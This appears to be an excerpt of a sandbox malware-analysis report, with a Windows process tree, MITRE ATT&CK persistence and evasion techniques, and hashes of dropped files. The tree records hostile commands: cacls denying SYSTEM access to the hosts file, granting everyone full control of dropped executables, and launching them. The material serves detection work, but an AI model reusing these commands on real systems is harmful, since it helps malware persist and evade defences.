C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5080
-
-
-
C:\Windows\SysWOW64\fkjvgk.exeC:\Windows\SysWOW64\fkjvgk.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1360
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:3036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3228
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:2696
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:3532
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2796
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:2068
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2420
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:3440
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:1344
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1484
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:5772
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:5308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6152
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:6164
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:6128
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5504
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.2MB
MD5a6f3d048606e871dd52ca2cb0f6a2425
SHA1557ba08aa34358dd6bed3c24e0cccf65a426a8c2
SHA256c83ce5397c9701e5024b4bb689e535e76a73a891485d24002c2b9f192a8bb73f
SHA5123d86c7e98ecafa71e4de3b72d16b3dfe86446b9cb4b627ea7592dcb88875d9ca7ee7adb1a05a08dcb64c84c4667adec7cb429ef5d2d3ea32f4941efeb2d5ca16
-
Filesize
1.2MB
MD507a6f19f0e4b70a9243b2a065b6535e3
SHA10051e75265f254e3ad4a2b824bc2048026c42d6f
SHA256c18358d8b6f02dc9f6ffe0092423044286f95c401a54a5387b66d2f491ce73d9
SHA51295c9b7710172d8de4ac79d311d64879acf62867d146658c0edc3e3fef6ecac0ab7e8dd56c9b5dd66543fa8e97c83d31926b2f28d3118fc809505140e46850e84
-
Filesize
26.0MB
MD5c1fc5f1915c9fef679128d4041a44b17
SHA17b010b64ce293e50e68fc31d20bea3cebeb3af99
SHA2561448bbfa8e03fcdefbe0611358482fbf5f25997e6932b22bf30486d41a349677
SHA5124c1550b2405df1ea0d5f9ffd51353c93aeeb2358706819320dd9c373b0c246f72a79515ab9db9b694bd35b2d382464d8153906e870f762a20bad1fcddd68c580
-
Filesize
7.6MB
MD5a31a2c9442609c0e2a8c23a4fa34e84b
SHA1cf249c3bb037d5b3542a177c8fb1d16bbeead987
SHA2561d21e39ed7cabb6fbf1c9238973c82edea7cbb1a129ae31e5ca52d833de5d1b7
SHA5127f7e9a61f3c50b4de95378f6a0e8d5642a93e7fdcd824771427ec9a0c1312f5c5709b9d0462be8305da2a40151940243ee80bf8c20f6c5713de8e4a96c9fad34
-
Filesize
810KB
MD5afacb464157f80869c17f2b4be28c55a
SHA13cb47bec6fd14e983d21473ca784cfb45549bd53
SHA256807d5128ef739d377a05f8c17907c7761a4678679a7b0d69771f802d07bce7ee
SHA51240fba051b7dc0427c8d5ac3eb741efb0a0f78a2d9e268cdb7354a9dd72b0ac65dc8b3b18bb5135c939e47f2e8166d1ced82c30821d9a1be1cb90bdf87d39209f
-
Filesize
3.8MB
MD52fc64bf6c7e59fcb87cb6a8700b7c0fa
SHA1e8aa0b285322c958be9c8df1305957f24a034710
SHA256f527c588d83b01fc90a69375e24e9395ea6428fbfb9fb5dc5ac4fa6319aa71b2
SHA51288cabe62c746b2bb2962f099f8ad3bd50793f1caac9107a8b12fba94d48bf9628bea7b9279fe53316e739fefe57c903941faba37644b4e3ba03faa9b3c73d635
-
Filesize
2.9MB
MD5b1539aa433dd3b34fa3a7a0ddb3a0326
SHA1f17f6f291ddc561042cb9c66e3f261670124cf14
SHA256efaf727b16c6ca38a978d2ac2305960c42bbb970efa7bd821460a75d5176e87f
SHA51257e3e59b33631804e4b201fd722c99ee30b9f6b01907a9a72aa863ed1e9403733457a3a1f90bc3f07d3a4ecb61333baf2a0b1457e8ab6c37a442a75cfa48b649
-
Filesize
33.6MB
MD52ccc7d53b24c47aa22ba7e9482b66cb5
SHA19a70597c68c811e76a772d70980442fb0807a1ac
SHA256a92d9eefc4690de3f2706ac327d771f785c46a9519448e921eeddcfbde1611f1
SHA512a8fd70378eb6afa08c02f8e57031e539bbd4e6ae9f7d05e946439a885184c51620586414c5814830f4359ec327625ed5b23f5bab08bde47c33bd8d05fd9af7d8
-
Filesize
44.2MB
MD5d6156918de301e4e4cd0f3953df4d3ae
SHA1a823e63dc5a4812ead1954de164a57fad9d1d169
SHA2566f0401be7eb014fd7aecbf000ccbd4f20de1c43b7160a2ddde80c8fbe472950f
SHA5121e729336adb2a849ce9db1ef6100ae9c3ff98cd3f2957078b3c353e9f896172778bfa278a39a575ba48b9a99ba973f383d46e0a3d1f1144cc823e6b023de2562
-
Filesize
8.7MB
MD5f887630bcb4c85d85f4fd8909193ab60
SHA174e9247efd76c62236750084be4ddd6212f14870
SHA256949b9468c249cf88e5707db9376d7132d888e48a44ea93c02cf0dd52f32d9a2a
SHA512d4aa80b1fc6db96e7ecd1af1d7678f2112c4a57e717348d0772c9daae5f80c4ed8cacac877149588e0f7c91a895a9f899084a9260b0a797a616992dec3c98698
-
Filesize
2.4MB
MD5db3584cc96d08e80e969cbab065463c4
SHA1628cce96b887ca64077a100e60c53b1f11fdb2d1
SHA256adef5c245da4dbac3f6a265440f79c98556ddd1163402d91c92c4ddc22d8677b
SHA512240568d1d894ad6cf726dce47d828e6541f073f6860b5da20b59b937a324c846968b2a8d8c84b548ff61bd493df66c132ec0c68b18dd09795a3a0c36d99a5abf
-
Filesize
20.5MB
MD5f6d1ab12a9021d4c945b5de387fab834
SHA169d0bf9f76b46cee5a29be7c1658ab8b7ba78117
SHA2569734f3d602e9838efe0a0511fee6f7f88437c31b2cf0c954ae5de262b6b22c99
SHA5129b285ba04fc41fabfc7ed9c06c99087ac777733c0277b38c5616d7da875a6583880f2bed85aecb6b24ffaa15ada6d8d73472d4cbb91bbf01e384afe6781a4e04
-
Filesize
4.2MB
MD508dc670eb06301dda200710db1a097a2
SHA15a01c05dbc20155973e36c8d14fd547404904cf8
SHA256a5835d5554a47b09d62c70ce23c6d2e3ed30a476143e8d102a4dda941efbe42c
SHA512211f1c5d42e7b30061ade0e0bbec1efd75ca62c2ab9880a2f4a4dacbc4074977c4a161a3b378b50c1036c284d9cf97e8e86660f22f131e16ee7e77b745ecc5de
-
Filesize
1019KB
MD5daf20c6b50ba21ca02317107e1708bb4
SHA19167667a335fe077bd9046e15c4bb661b983e3ce
SHA256db2435c56b0b7c99b42b702106bd2e39d861beeb61df70036511ee76f005e5e9
SHA5123bb461dea8fb0c4e212541709105452d4c4c24fda12601bc95a23f91f20c816a1370132b771fef8cdd1a45a042beccc9500ea0333347c90770dcdeee9e8479d4
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
9.0MB
MD55c4f703dc026488905401b2bc17e8cf3
SHA191e2c4df57636f4ab374ea7d40072c0af0e1e122
SHA25652cc74dec14a548237db3768024bd02f716189f618ebb4661d5b63548170079b
SHA512efbb52ab7e1b75ce3adb9800228c31da537c378a019d229f63105b80f0121ad0af838c40470a10f42a0ef82b39f6e2ee4a8f1778aa825253549e88b5809bcfaf
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe